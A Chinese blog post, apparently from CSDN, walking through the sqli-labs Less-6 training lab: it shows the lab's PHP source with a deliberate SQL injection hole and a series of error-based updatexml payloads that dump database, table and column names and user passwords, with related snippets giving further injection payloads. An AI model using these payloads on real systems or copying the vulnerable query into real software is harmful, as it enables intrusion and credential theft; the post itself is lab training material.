sqli-labs:pass-6(双引号报错注入)

最新推荐文章于 2022-03-08 21:37:16 发布
最新推荐文章于 2022-03-08 21:37:16 发布
阅读量106 收藏
点赞数
分类专栏: SQL注入 文章标签: SQL注入 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/118710714
版权

 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-6 Double Query- Double Quotes- String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3"  color= "#FFFF00">';
	print_r(mysql_error());
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-6.jpg" /></center>
</body>
</html>

?id=1 and 1=2(回显,不是数字型)
?id=1"--+(正常回显,双引号字符型报错注入)

?id=1" and updatexml(1,concat(0x7e,database(),0x7e),3)--+(看当前数据库)
?id=-1" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)--+(看所有数据库)
?id=-1" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1)--+(查表名)
?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31),0x7e),1)--+(查列名)
?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(id,username,password) from users),1,31),0x7e),1)--+(获取数据)

~羽~.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
文件上传漏洞靶场upload-labs学习(pass6-pass10)
AFCC_的博客(Web_Dog)
03-06 3123
0X00 Pass6 第6关从后缀绕过的角度考察,源码为: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3"
SQL注入】Less-6双注入GET双引号字符型注入
Mitchell_Donovan的博客
03-30 579
Less-6双注入GET双引号字符型注入 本实验于上一个实验Less-5双注入GET单引号字符型注入手法上几乎一致!区别在于payload中'单引号改为"双引号!也就是在本实验中,你可以用Less-5实验中的payload;不过本实验将用另外一种方法来完成该实验的sql注入。 实验开始 布尔型注入简称盲注,正确会回显,错误没有回显,以此为依据逐字进行想要的字段或者命名进行猜解爆破;在上诉实验中我们已知:数据库名security表名users字段nameuser password 手工注入时可使用例如l
sql-libs(6) 双引号报错注入
weixin_30763455的博客
08-13 174
payload:http://192.168.48.130/sqli-laaess-6/?id=1" and updatexml(1,concat(0x7e,(SELECT schema_name from information_schema.schemata limit 8,1),0x7e),1)--+ 后面就不写了 ,麻烦 转载于:https://www.cnb...
sqli-labs(5到7关)
gclome的博客
07-10 2370
sqli-labs-master(5-7关) 参考资料:https://www.jianshu.com/p/a3287fbb20f1 Less-5(双注入GET单引号字符型注入) 方法:双注入或盲注 双查询注入顾名思义形式上是两个嵌套的查询,即select …(select …),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select,双注入主要涉及到了几个...
③基于字符型的SQL注入
熊俊坤的博客
10-24 9941
基于字符型的SQL注入
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQL练习(less-4)双引号字符型注入
AmyBaby00的博客
08-27 1091
http://127.0.0.1/sqli/Less-4/?id=1 id=1 and 1=2 (1=2 条件不成立) 正常回显 判断为字符型注入 很多时候仅仅使用单一的符号进行判断是完全不够的,要多使用不同类型的符号来进行测试的判断,使用包括’,",,(,=,&等等字符,甚至有时候还要使用其他的探查方法,只有不断的进行尝试。 注意:一定是英文的标点符号 判断为")注入 查询显示位 判断...
Sqli-Labs之less-6
ISNS的博客
02-09 710
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 我们可以看到less-6的题目提示: 得知这道题是“双注入-双引号-字符型”。 所以,这道题的除了判断注入点时是【"–+】以外,其余的解题步骤和less-5是一模一样的! 完整过程详见: Sqli-Labs之less-5(双注入解法) 最后的结果是: ...
sql-lab(ALL 1-65)
lee_maple的博客
03-08 8256
less-1(基于错误的GET单引号字符型注入) id=1 //回显正常 id=1' //报错信息:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 id=1' order by 4 # //用
sql 双引号_面对SQL注入的骚操作,我们如何预防
weixin_39827304的博客
12-05 588
SQL注入是一种常见的Web漏洞攻击手段,危害非常严重。攻击者利用漏洞不但可以看到全部数据,更有甚者删库跑路。一、啥是SQL注入SQL注入,可以利用传入的参数,进行恶意伪造,伪造后的参数最终通过前台传入到后端执行,1、示例一(查询敏感信息)比如,我们有一个查询接口,可以查询当前用户的信息,select * from user where id = '1';正常执行不会出现问题,一旦被sql注入,比...
Sqli-labs2-5单引号变形,双引号,双注入
Recar的博客
12-12 4310
第二题第二个就是整形的了第一个是字符串的整形与字符注入的区别!!!整形是不用单引号闭合的,不要后面注释直接 union联合查询就可以了~~ 接下来就可以继续向第一题那样测试了整型不需要闭合就可以执行后面的语句,字符型的则要闭合http://localhost:9096/sqli-labs/Less-2/?id=-1 union select 1,2,table_name from informat
Sqli-labs 基本注入篇 (Less1~22)
angry_program的博客
01-20 1562
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 基本注入篇对应labs的1~22关: 目录 Sqli-labs 基本注入篇 Less-1 单引号显错注入 一、手工注入 1. 判断字符型与整数型注入 2. 爆字段数 3. 爆库爆表爆字段 4. 取对应字段的值 二、sqlmap自动注入 1. 检测目标网站存在的注入漏洞类型 2....
SQLi LABS Less-6 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-26 1万+
sqlilabs 第六关,sqli-labs less-6,sqlibals less 6
sqli-labs Less-6(双注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-02 609
1、判断SQL语句是使用什么闭合的 使用双引号闭合。 2、判断有几个字段 payload ?id=1" order by 3 --+ 存在3个字段 3、爆出数据库版本和当前数据库名 payload ?id=1" union select 1,2,count(1) from information_schema.tables group by concat(floor(rand(0)*2),version()) --+ ?id=1" union select 1,2,count(1) from info
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值